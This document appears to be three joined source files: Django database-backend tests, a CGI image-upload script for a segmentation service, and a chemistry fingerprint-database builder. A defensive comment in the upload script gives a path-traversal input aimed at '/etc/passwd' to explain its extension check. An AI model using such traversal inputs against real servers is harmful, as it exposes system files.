with self.assertRaises(IntegrityError):
connection.check_constraints()
transaction.set_rollback(True)
class ThreadTests(TransactionTestCase):
available_apps = ['backends']
def test_default_connection_thread_local(self):
"""
Ensure that the default connection (i.e. django.db.connection) is
different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
connection.cursor()
connections_dict[id(connection)] = connection
def runner():
# Passing django.db.connection between threads doesn't work while
# connections[DEFAULT_DB_ALIAS] does.
from django.db import connections
connection = connections[DEFAULT_DB_ALIAS]
# Allow thread sharing so the connection can be closed by the
# main thread.
connection.allow_thread_sharing = True
connection.cursor()
connections_dict[id(connection)] = connection
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
# Check that each created connection got different inner connection.
self.assertEqual(
len(set(conn.connection for conn in connections_dict.values())),
3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_connections_thread_local(self):
"""
Ensure that the connections are different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
for conn in connections.all():
connections_dict[id(conn)] = conn
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_dict[id(conn)] = conn
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_dict), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
Ensure that a connection can be passed from one thread to the other.
Refs #17258.
"""
models.Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
models.Person.objects.get(first_name="John", last_name="Doe")
except Exception as e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(exceptions, [])
def test_closing_non_shared_connections(self):
"""
Ensure that a connection that is not explicitly shareable cannot be
closed by another thread.
Refs #17258.
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class MySQLPKZeroTests(TestCase):
"""
Zero as id for AutoField should raise exception in MySQL, because MySQL
does not allow zero for autoincrement primary key.
"""
@skipIfDBFeature('allows_auto_pk_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
models.Square.objects.create(id=0, root=0, square=1)
class DBConstraintTestCase(TestCase):
def test_can_reference_existent(self):
obj = models.Object.objects.create()
ref = models.ObjectReference.objects.create(obj=obj)
self.assertEqual(ref.obj, obj)
ref = models.ObjectReference.objects.get(obj=obj)
self.assertEqual(ref.obj, obj)
def test_can_reference_non_existent(self):
self.assertFalse(models.Object.objects.filter(id=12345).exists())
ref = models.ObjectReference.objects.create(obj_id=12345)
ref_new = models.ObjectReference.objects.get(obj_id=12345)
self.assertEqual(ref, ref_new)
with self.assertRaises(models.Object.DoesNotExist):
ref.obj
def test_many_to_many(self):
obj = models.Object.objects.create()
obj.related_objects.create()
self.assertEqual(models.Object.objects.count(), 2)
self.assertEqual(obj.related_objects.count(), 1)
intermediary_model = models.Object._meta.get_field("related_objects").rel.through
intermediary_model.objects.create(from_object_id=obj.id, to_object_id=12345)
self.assertEqual(obj.related_objects.count(), 1)
self.assertEqual(intermediary_model.objects.count(), 2)
class BackendUtilTests(TestCase):
def test_format_number(self):
"""
Test the format_number converter utility
"""
def equal(value, max_d, places, result):
self.assertEqual(format_number(Decimal(value), max_d, places), result)
equal('0', 12, 3,
'0.000')
equal('0', 12, 8,
'0.00000000')
equal('1', 12, 9,
'1.000000000')
equal('0.00000000', 12, 8,
'0.00000000')
equal('0.000000004', 12, 8,
'0.00000000')
equal('0.000000008', 12, 8,
'0.00000001')
equal('0.000000000000000000999', 10, 8,
'0.00000000')
equal('0.1234567890', 12, 10,
'0.1234567890')
equal('0.1234567890', 12, 9,
'0.123456789')
equal('0.1234567890', 12, 8,
'0.12345679')
equal('0.1234567890', 12, 5,
'0.12346')
equal('0.1234567890', 12, 3,
'0.123')
equal('0.1234567890', 12, 1,
'0.1')
equal('0.1234567890', 12, 0,
'0')
equal('0.1234567890', None, 0,
'0')
equal('1234567890.1234567890', None, 0,
'1234567890')
equal('1234567890.1234567890', None, 2,
'1234567890.12')
equal('0.1234', 5, None,
'0.1234')
equal('123.12', 5, None,
'123.12')
with self.assertRaises(Rounded):
equal('0.1234567890', 5, None,
'0.12346')
with self.assertRaises(Rounded):
equal('1234567890.1234', 5, None,
'1234600000')
@ignore_warnings(category=UserWarning,
message="Overriding setting DATABASES can lead to unexpected behavior")
class DBTestSettingsRenamedTests(TestCase):
mismatch_msg = ("Connection 'test-deprecation' has mismatched TEST "
"and TEST_* database settings.")
def setUp(self):
super(DBTestSettingsRenamedTests, self).setUp()
self.handler = ConnectionHandler()
self.db_settings = {'default': {}}
def test_mismatched_database_test_settings_1(self):
# if the TEST setting is used, all TEST_* keys must appear in it.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_NAME': 'foo',
}
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_2(self):
# if the TEST setting is used, all TEST_* keys must match.
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_3(self):
# Verifies the mapping of an aliased key.
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': 'foo'},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_4(self):
# Verifies the mapping of an aliased key when the aliased key is missing.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_old_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': None},
'TEST_CREATE': '',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_new_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': None,
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_matched_test_settings(self):
# should be able to define new settings and the old, if they match
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_new_settings_only(self):
# should be able to define new settings without the old
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
@ignore_warnings(category=RemovedInDjango19Warning)
def test_old_settings_only(self):
# should be able to define old settings without the new
self.db_settings.update({
'test-deprecation': {
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_empty_settings(self):
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('default')
@unittest.skipUnless(connection.vendor == 'sqlite', 'SQLite specific test.')
@skipUnlessDBFeature('can_share_in_memory_db')
class TestSqliteThreadSharing(TransactionTestCase):
available_apps = ['backends']
def test_database_sharing_in_threads(self):
def create_object():
models.Object.objects.create()
create_object()
thread = threading.Thread(target=create_object)
thread.start()
thread.join()
self.assertEqual(models.Object.objects.count(), 2)
|
imageUpload.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
################################################################################
# Argon Design Ltd. Project P8010 Spock
# (c) Copyright 2018 Argon Design Ltd. All rights reserved.
#
# Module: Gumpifier
# Author : Patrick Taylor
################################################################################
"""
This CGI script takes the foreground and background images uploaded by the user and saves them to disk.
It then sends a URL to the saved image to:
* The user - we can't access thei local version because of browser security features
* The TF server - to begin its processing (e.g. segmentation)
Refer to here for a CGI programming guide: https://www.tutorialspoint.com/python/python_cgi_programming.htm
CGI args:
JSON. Either {'fgimage': data} or {'bgimage': data}
CGI return:
String. URL to uploaded image.
"""
import cgi, os
import cgitb; cgitb.enable() # Traceback enable
from TF_interface import sendData
import threading
import hashlib, time, random
form = cgi.FieldStorage()
os.chdir("..")
# Get the file item (data and name)
# Set the command keyword we send to the TF server
if 'fgimage' in form:
fileitem = form['fgimage']
command = 'sgtF'
elif 'bgimage' in form:
fileitem = form['bgimage']
command = 'sgtB'
# Test if the file was uploaded
if fileitem.filename: # fileitem.filename is actually a path
# Save the photo
extension = os.path.basename(fileitem.filename).split('.')[-1]
# Try to guard against an insertion attack by testing that the extension is correct
# E.g. extension might be "/../....../etc/passwd"
if extension.lower() not in ['jpg', 'jpeg', 'png']: # https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_types/Complete_list_of_MIME_types
message = "ERROR:Filetype"
else:
hashName = hashlib.md5(str(time.time()).encode("utf8") + str(random.random()).encode("utf8")).hexdigest() + "." + extension
savedPath = os.path.join("storage", hashName)
# Use technique here to ensure strict permissions: https://stackoverflow.com/a/45368120
with open(os.open(savedPath, os.O_CREAT | os.O_WRONLY, 0o644), 'wb') as outputFile:
outputFile.write(fileitem.file.read())
# Set the TF server segmenting the image. We're not waiting for a response from this one so use threading
threading.Thread(target=sendData, args=(savedPath, command)).start()
# Return the file where the image is stored
message = savedPath
else:
message = "ERROR:No file uploaded"
# Return stuff to client
print("""Content-type: text/html
{}""".format(message))
|
subsim_search.py
|
# -*- coding: utf-8 -*-
from __future__ import annotations
import time
import multiprocessing
import os
import warnings
from collections import defaultdict
from io import BytesIO
from typing import Optional, Tuple, Union
import pystow
import rdkit
from rdkit import Chem
import pandas as pd
from tqdm import tqdm
from rdkit.Chem.rdSubstructLibrary import SubstructLibrary, PatternHolder, CachedMolHolder
try:
import cupy
except ImportError as e:
cupy = e
try:
import tables as tb
except ImportError as e:
tb = e
try:
import FPSim2
from FPSim2.io.backends.pytables import create_schema, BATCH_WRITE_SIZE, calc_popcnt_bins_pytables
from FPSim2.io.backends.base import BaseStorageBackend
from FPSim2.base import BaseEngine
from FPSim2.FPSim2 import FPSim2Engine
from FPSim2.FPSim2Cuda import FPSim2CudaEngine
from FPSim2.io.chem import load_molecule
except ImportError as e:
FPSim2 = e
# Placeholders
BaseStorageBackend = str
BaseEngine = str
FPSim2Engine = str
FPSim2CudaEngine = str
from .fingerprint import *
from .utils.mol_reader import MolSupplier
from .utils.IO import locate_file, get_num_rows_in_file, process_data_version
class FPSubSim2:
def __init__(self):
if isinstance(tb, ImportError) and isinstance(FPSim2, ImportError):
raise ImportError('Some required dependencies are missing:\n\ttables, FPSim2')
elif isinstance(tb, ImportError):
raise ImportError('Some required dependencies are missing:\n\ttables')
elif isinstance(FPSim2, ImportError):
raise ImportError('Some required dependencies are missing:\n\tFPSim2')
elif isinstance(BaseStorageBackend, str) or \
isinstance(BaseEngine, str) or \
isinstance(FPSim2Engine, str) or \
isinstance(FPSim2CudaEngine, str):
raise ImportError('Some FPSim2 components could not be loaded')
self.version = None
self.is3d = None
self.sd_file = None
self.h5_filename = None
def create_from_papyrus(self,
is3d: bool = False,
version: str = 'latest',
outfile: Optional[str] = None,
fingerprint: Optional[Union[Fingerprint, List[Fingerprint]]] = MorganFingerprint(),
root_folder: Optional[str] = None,
progress: bool = True,
njobs: int = 1):
"""Create an extended FPSim2 database from Papyrus data.
:param is3d: Toggle the use of non-standardised (3D) data (default: False)
:param version: version of the Papyrus dataset to be used
:param outfile: filename or filepath of output database
:param fingerprint: fingerprints to be calculated, if None uses all available
:param root_folder: folder containing the bioactivity dataset (default: pystow's home folder)
:param progress: whether progress should be shown
:param njobs: number of concurrent processes (-1 for all available logical cores)
:return:
"""
# Set version
self.version = process_data_version(version=version, root_folder=root_folder)
# Determine default paths
if root_folder is not None:
os.environ['PYSTOW_HOME'] = os.path.abspath(root_folder)
source_path = pystow.join('papyrus', self.version, 'structures')
# Find the file
filenames = locate_file(source_path.as_posix(),
f'*.*_combined_{3 if is3d else 2}D_set_with{"out" if not is3d else ""}_stereochemistry.sd*')
sd_file = filenames[0]
total = total = get_num_rows_in_file(filetype='structures', is3D=is3d, version=self.version, root_folder=root_folder)
self.create(sd_file=sd_file, outfile=outfile, fingerprint=fingerprint, total=total, progress=progress, njobs=njobs)
def create(self,
sd_file: str,
outfile: Optional[str] = None,
fingerprint: Union[Fingerprint, List[Fingerprint]] = MorganFingerprint(),
progress: bool = True,
total: Optional[int] = None,
njobs: int = 1):
"""Create an extended FPSim2 database to deal with multiple similarity
fingerprints and handle full substructure search (subgraph isomorphism)
and load it when finished.
:param papyrus_sd_file: papyrus sd file containing chemical structures
:param version: version of the Papyrus dataset
:param outfile: filename or filepath of output database
:param fingerprint: fingerprints to be calculated, if None uses all available
:param progress: whether progress should be shown
:param total: number of molecules for progress display
:param njobs: number of concurrent processes (-1 for all available logical cores)
"""
self.sd_file = sd_file
# Set outfile name if not supplied
if outfile is None:
self.h5_filename = f'Papyrus_{self.version}_FPSubSim2_{3 if self.is3d else 2}D.h5'
else:
self.h5_filename = outfile
# Set fingerprints if not supplied
if fingerprint is not None:
if isinstance(fingerprint, list):
for x in fingerprint:
if not isinstance(x, Fingerprint):
raise ValueError(f'{x} is not a supported fingerprint')
elif not isinstance(fingerprint, Fingerprint):
raise ValueError(f'{fingerprint} is not a supported fingerprint')
else:
fingerprint = [fp() for fp in Fingerprint.derived()]
if not isinstance(fingerprint, list):
fingerprint = [fingerprint]
# Ensure njobs is a correct value
if not isinstance(njobs, int) or njobs < -1:
raise ValueError('number of jobs must be -1 or above')
# set compression
filters = tb.Filters()
# set the output file and fps table
with tb.open_file(self.h5_filename, mode="w") as h5file:
# group to hold similarity tables
simil_group = h5file.create_group(
h5file.root, "similarity_info", "Infos for similarity search")
# group to hold substructure library
subst_group = h5file.create_group(
h5file.root, "substructure_info", "Infos for substructure search")
# Array containing processed binary of the substructure library
subst_table = h5file.create_earray(
subst_group, 'substruct_lib', tb.UInt64Atom(), (0,), 'Substructure search library')
# Table for mapping indices to identifiers
h5file.create_table(
h5file.root, 'mol_mappings',
np.dtype([("idnumber", "<i8"), ("connectivity", "S14"), ("InChIKey", "S27")]),
'Molecular mappings', expectedrows=1300000, filters=filters)
# Set config table containing rdkit version
param_table = h5file.create_vlarray(
h5file.root, "config", atom=tb.ObjectAtom())
param_table.append([rdkit.__version__, self.version, '3D' if self.is3d else '2D'])
# Create fingerprint tables
for fp_type in fingerprint:
fp_group = h5file.create_group(simil_group, repr(fp_type), f'Similarity {repr(fp_type)}')
particle = create_schema(fp_type.length)
fp_table = h5file.create_table(fp_group, 'fps', particle, 'Similarity FPs', expectedrows=1300000,
filters=filters)
fp_table.attrs.fp_type = fp_type.name
fp_table.attrs.fp_id = repr(fp_type)
fp_table.attrs.length = fp_type.length
fp_table.attrs.fp_params = json.dumps(fp_type.params)
# Get the number of molecules to process
if njobs in [0, 1]:
self._single_process_create(fingerprint, progress, total)
else:
self._parallel_create(njobs, fingerprint, progress, total)
self.load(self.h5_filename)
def load(self, fpsubsim_path: str):
"""Load an extended FPSim2 database to deal with multiple similarity
fingerprints and handle full substructure search (subgraph isomorphism).
:param fpsubsim_path: path to the FPSubSim2 library
"""
if not os.path.isfile(fpsubsim_path):
raise ValueError(f'File {fpsubsim_path} does not exist')
self.h5_filename = fpsubsim_path
with tb.open_file(self.h5_filename) as h5file:
rdkit_version, self.version, is3D = h5file.root.config.read()[0]
if rdkit.__version__ != rdkit_version:
warnings.warn(f'RDKit version {rdkit.__version__} differs: library was generated with {rdkit_version}. '
'Consider regenerating the FPSubSim2 library to avoid unexpected behaviour.')
self.is3d = is3D == "3D"
def _single_process_create(self, fingerprint: Union[Fingerprint, List[Fingerprint]], progress: bool = True,
total: Optional[int] = None):
"""Fill in the similarity tables from a unique process."""
with tb.open_file(self.h5_filename, mode="r+") as h5file:
# substructure rdkit library
lib = SubstructLibrary(CachedMolHolder(), PatternHolder())
# Links to goups and tables
subst_table = h5file.root.substructure_info.substruct_lib
mappings_table = h5file.root.mol_mappings
# Create fingerprints, mappings and substructure library
table_paths = {} # path to fp tables
fps = defaultdict(list) # data to be written into fp tables
mappings = []
for fp_type in fingerprint:
table_paths[repr(fp_type)] = f"/similarity_info/{repr(fp_type)}/fps"
with MolSupplier(source=self.sd_file, total=total, show_progress=progress,
start_id=1) as supplier:
for mol_id, rdmol in supplier:
# Add molecule to substructure search lib
lib.AddMol(rdmol)
# Get mapping information
props = rdmol.GetPropsAsDict()
connectivity = props.get('connectivity', '')
inchikey = props.get('InChIKey', Chem.MolToInchiKey(rdmol))
if not connectivity:
connectivity = inchikey.split('-')[0]
mappings.append((mol_id, connectivity, inchikey))
for fp_type in fingerprint:
# generate fingerprint
fp = fp_type.get(rdmol)
fps[fp_type].append((mol_id, *fp))
# flush buffer
if len(fps[fingerprint[0]]) == BATCH_WRITE_SIZE:
for fp_type in fingerprint:
h5file.get_node(table_paths[str(fp_type)]).append(fps[fp_type])
mappings_table.append(mappings)
fps, mappings = defaultdict(list), []
# append last batch < 32k
if len(fps[fingerprint[0]]):
for fp_type in fingerprint:
h5file.get_node(table_paths[str(fp_type)]).append(fps[fp_type])
h5file.get_node(table_paths[str(fp_type)]).flush()
mappings_table.append(mappings)
mappings_table.flush()
# create index so table can be sorted
for fp_type in fingerprint:
h5file.get_node(table_paths[str(fp_type)]).cols.popcnt.create_index(kind="full")
h5file.root.mol_mappings.cols.idnumber.create_index(kind="full")
# serialize substruct lib and pad
lib_bytes = lib.Serialize()
remainder = len(lib_bytes) % 8
padding = 8 - remainder if remainder else 0 # int64 are 8 bytes
if padding:
lib_bytes += b'\x00' * padding
lib_ints = np.frombuffer(lib_bytes, dtype=np.int64)
# save into h5
subst_table.attrs.padding = padding
subst_table.append(lib_ints)
# sort by popcounts
sort_db_file(self.h5_filename, verbose=progress)
def _parallel_create(self, njobs=-1, fingerprint: Union[Fingerprint, List[Fingerprint]] = None,
progress: bool = True, total: Optional[int] = None):
"""Fill in the similarity tables with multiple processes."""
# Fingerprint types and params to be passed to workers (instances are not thread safe)
fp_types = [(type(fp_type), fp_type.params) for fp_type in fingerprint]
# Mappings from fingerprint id to table path
table_paths = {repr(fp_type): f"/similarity_info/{repr(fp_type)}/fps" for fp_type in fingerprint}
# input and output queue
input_queue = multiprocessing.Queue()
output_queue = multiprocessing.Queue()
# define number of workers (keep 1 reader and 1 writer)
if njobs == -1:
n_cpus = multiprocessing.cpu_count() - 2 # number of threads (logical cores)
else:
n_cpus = njobs - 1
processes = []
# Start reader
reader = multiprocessing.Process(target=_reader_process, args=(self.sd_file, n_cpus, total, False, input_queue, output_queue))
processes.append(reader)
reader.start()
# Start writer
writer = multiprocessing.Process(target=_writer_process, args=(self.h5_filename, output_queue, table_paths, total, progress))
writer.start()
# Start workers
for i in range(n_cpus):
job = multiprocessing.Process(target=_worker_process, args=(fp_types, input_queue, output_queue, n_cpus))
processes.append(job)
processes[-1].start()
# Joining workers
while len(processes):
processes[0].join(10)
if not processes[0].is_alive():
del processes[0]
output_queue.put('STOP')
writer.join()
input_queue.close()
input_queue.join_thread()
output_queue.close()
output_queue.join_thread()
# sort by popcounts
sort_db_file(self.h5_filename, verbose=progress)
@property
def available_fingerprints(self):
if hasattr(self, '_avail_fp'):
return self._avail_fp
self._avail_fp = {}
with tb.open_file(self.h5_filename, mode="r") as h5file:
for simfp_group in h5file.walk_groups('/similarity_info/'):
if len(simfp_group._v_name):
fp_table = h5file.get_node(simfp_group, 'fps', classname='Table')
fp_type = fp_table.attrs.fp_type
fp_params = json.loads(fp_table.attrs.fp_params)
self._avail_fp[fp_table.attrs.fp_id] = get_fp_from_name(fp_type, **fp_params)
return self._avail_fp
def get_substructure_lib(self):
if not os.path.isfile(self.h5_filename):
raise ValueError('file must be created first')
with tb.open_file(self.h5_filename, mode="r") as h5file:
padding = h5file.root.substructure_info.substruct_lib.attrs.padding
data = h5file.root.substructure_info.substruct_lib.read()
with BytesIO(data.tobytes('C')[:-padding]) as stream:
lib = SubstructureLibrary(self.h5_filename)
lib.InitFromStream(stream)
return lib
def get_similarity_lib(self, fp_signature: Optional[str] = None, cuda: bool = False):
"""Obtain a similarity engine for the desired fingerprint.
:param fp_signature: Signature of the desired fingerprint
:param cuda: whether to run searches on the GPU
"""
if not os.path.isfile(self.h5_filename):
raise ValueError('file must be created first')
_ = self.available_fingerprints # initialize self._avail_fp
if fp_signature not in [*self._avail_fp.keys(), None]:
raise ValueError(f'fingerprint not available, choose one of {self._avail_fp.keys()}')
elif fp_signature is None:
fp_signature = list(self._avail_fp.keys())[0]
if cuda:
return FPSubSim2CudaEngine(self.h5_filename, fp_signature)
return FPSubSim2Engine(self.h5_filename, fp_signature)
def add_fingerprint(self, fingerprint: Fingerprint, papyrus_sd_file: str, progress: bool = True, total: Optional[int]= None):
"""Add a similarity fingerprint to the FPSubSim2 database.
:param fingerprint: Fingerprint to be added
:param papyrus_sd_file: papyrus sd file containing chemical structures
:param progress: whether progress should be shown
:param total: number of molecules for progress display
"""
signature = str(fingerprint)
available_fps = [*self.available_fingerprints.keys()]
if signature in available_fps:
print(f'fingerprint f{signature} is already available')
return
backend = PyTablesMultiFpStorageBackend(self.h5_filename, available_fps[0])
backend.change_fp_for_append(fingerprint)
backend.append_fps(MolSupplier(source=papyrus_sd_file), total=total, progress=progress)
def add_molecules(self, papyrus_sd_file: str, progress: bool = True, total: Optional[int]= None):
"""Add molecules to the FPSubSim2 database.
:param papyrus_sd_file: papyrus sd file containing new chemical structures
:param progress: whether progress should be shown
:param total: number of molecules for progress display
"""
for signature, fingerprint in self.available_fingerprints:
backend = PyTablesMultiFpStorageBackend(self.h5_filename, signature)
backend.append_fps(MolSupplier(source=papyrus_sd_file), total=total, progress=progress, sort=False)
substruct_lib = self.get_substructure_lib()
for rdmol in MolSupplier(source=papyrus_sd_file, total=total, progress=progress):
if rdmol is not None:
substruct_lib.AddMol(rdmol)
# serialize substruct lib and pad
lib_bytes = substruct_lib.Serialize()
remainder = len(lib_bytes) % 8
padding = 8 - remainder if remainder else 0 # int64 are 8 bytes
if padding:
lib_bytes += b'\x00' * padding
lib_ints = np.frombuffer(lib_bytes, dtype=np.int64)
# save into h5
with tb.open_file(self.h5_filename, mode="a") as h5file:
# Remove previous lib
h5file.remove_node(h5file.root.substructure_info.substruct_lib)
h5file.create_earray(h5file.root.substructure_info, 'substruct_lib', tb.UInt64Atom(), (0,), 'Substructure search library')
h5file.root.substructure_info.substruct_lib.attrs.padding = padding
h5file.root.substructure_info.substruct_lib.append(lib_ints)
sort_db_file(self.h5_filename, verbose=progress)
def _reader_process(sd_file, n_workers, total, progress, input_queue, output_queue):
with MolSupplier(source=sd_file, total=total, show_progress=progress, start_id=1) as supplier:
count = 0
for mol_id, rdmol in supplier:
input_queue.put((mol_id, rdmol, rdmol.GetPropsAsDict()))
# Allow the queue to get emptied periodically
count += 1
if count > BATCH_WRITE_SIZE * n_workers * 1.5:
while input_queue.qsize() > BATCH_WRITE_SIZE:
time.sleep(10)
count = 0
for _ in range(n_workers):
input_queue.put('END')
def _writer_process(h5_filename, output_queue, table_paths, total, progress):
lib = SubstructLibrary(CachedMolHolder(), PatternHolder())
pbar = tqdm(total=total, smoothing = 0.0) if progress else {}
mappings_insert = []
similarity_insert = defaultdict(list)
with tb.open_file(h5_filename, mode="r+") as h5file:
while True:
data = output_queue.get()
if data == 'STOP':
# flush remnants of data
h5file.root.mol_mappings.append(mappings_insert)
for fp_id, fp_insert in similarity_insert.items():
h5file.get_node(table_paths[fp_id]).append(fp_insert)
# serialize substructure lib and pad
lib_bytes = lib.Serialize()
remainder = len(lib_bytes) % 8
padding = 8 - remainder if remainder else 0 # int64 are 8 bytes
if padding:
lib_bytes += b'\x00' * padding
lib_ints = np.frombuffer(lib_bytes, dtype=np.int64)
h5file.root.substructure_info.substruct_lib.attrs.padding = padding
h5file.root.substructure_info.substruct_lib.append(lib_ints)
# create index so tables can be sorted
for fp_table_path in table_paths.values():
h5file.get_node(fp_table_path).cols.popcnt.create_index(kind="full")
h5file.root.mol_mappings.cols.idnumber.create_index(kind="full")
break
if data[0] == 'mappings':
mappings_insert.append(data[1])
pbar.update()
elif data[0] == 'substructure':
lib.AddMol(data[1])
del data
elif data[0] == 'similarity':
fp_id, fp = data[1], data[2]
similarity_insert[fp_id].append(fp)
# insert data
if len(mappings_insert) > BATCH_WRITE_SIZE:
h5file.root.mol_mappings.append(mappings_insert)
h5file.root.mol_mappings.flush()
mappings_insert = []
if any(len(x) > BATCH_WRITE_SIZE for x in similarity_insert.values()):
for fp_id, fp_insert in similarity_insert.items():
h5file.get_node(table_paths[fp_id]).append(fp_insert)
h5file.get_node(table_paths[fp_id]).flush()
similarity_insert = defaultdict(list)
# ensure index in mol_mappings
with tb.open_file(h5_filename, mode="r+") as h5file:
h5file.root.mol_mappings.cols.idnumber.reindex()
return
def _worker_process(fp_types, input_queue, output_queue, n_workers):
while True:
# while output_queue.qsize() > BATCH_WRITE_SIZE * n_workers / 2:
# time.sleep(0.5)
data = input_queue.get()
if data == 'END':
# pass end signal to writing process
break
mol_id, rdmol, props = data
# put the molecule for the writer to handle substructure
output_queue.put(('substructure', rdmol))
# handle mappings
connectivity = props.get('connectivity', '')
inchikey = props.get('InChIKey', '')
if not inchikey and connectivity:
connectivity = inchikey.split('-')[0]
output_queue.put(('mappings', (mol_id, connectivity, inchikey)))
for fp_type, fp_params in fp_types:
fper = fp_type(**fp_params)
# generate fingerprint
fp = fper.get(rdmol)
output_queue.put(('similarity', repr(fper), (mol_id, *fp)))
def sort_db_file(filename: str, verbose: bool=False) -> None:
"""Sorts the FPs db file."""
if verbose:
print('Optimizing FPSubSim2 file.')
# rename not sorted filename
tmp_filename = filename + "_tmp"
if os.path.isfile(tmp_filename):
os.remove(tmp_filename)
os.rename(filename, tmp_filename)
filters = tb.Filters(complib="blosc", complevel=1, shuffle=True, bitshuffle=True)
stats = {
"groups": 0,
"leaves": 0,
"links": 0,
"bytes": 0,
"hardlinks": 0,
}
# copy sorted fps and config to a new file
with tb.open_file(tmp_filename, mode="r") as fp_file:
with tb.open_file(filename, mode="w") as sorted_fp_file:
# group to hold similarity tables
siminfo_group = sorted_fp_file.create_group(sorted_fp_file.root, "similarity_info", "Infos for similarity search")
simfp_groups = list(fp_file.walk_groups('/similarity_info/'))
i = 0
for simfp_group in simfp_groups:
if len(simfp_group._v_name):
dst_group = simfp_group._f_copy(siminfo_group, recursive=False, filters=filters, stats=stats)
# progress bar
if verbose:
pbar = tqdm(list(fp_file.iter_nodes(simfp_group, classname='Table')),
desc=f'Optimizing tables of group ({i}/{len(simfp_groups)})',
leave=False)
else:
pbar = fp_file.iter_nodes(simfp_group, classname='Table')
for fp_table in pbar:
# create a sorted copy of the fps table
dst_fp_table = fp_table.copy(
dst_group,
fp_table.name,
filters=filters,
copyuserattrs=True,
overwrite=True,
stats=stats,
start=None,
stop=None,
step=None,
chunkshape="auto",
sortby="popcnt",
check_CSI=True,
propindexes=True,
)
# update count ranges
popcnt_bins = calc_popcnt_bins_pytables(dst_fp_table, fp_table.attrs.length)
popcounts = sorted_fp_file.create_vlarray(dst_group, 'popcounts', tb.ObjectAtom(), f'Popcounts of {dst_group._v_name}')
for x in popcnt_bins:
popcounts.append(x)
# add other tables
if verbose:
print('Optimizing remaining groups and arrays.')
for node in fp_file.iter_nodes(fp_file.root):
if isinstance(node, tb.group.Group):
if isinstance(node, tb.group.RootGroup) or 'similarity_info' in str(node):
continue
_ = node._f_copy(sorted_fp_file.root, node._v_name, overwrite=True, recursive=True, filters=filters, stats=stats)
else:
_ = node.copy(sorted_fp_file.root, node._v_name, overwrite=True, stats=stats)
# remove unsorted file
if verbose:
print('Cleaning up temporary files.')
os.remove(tmp_filename)
class PyTablesMultiFpStorageBackend(BaseStorageBackend):
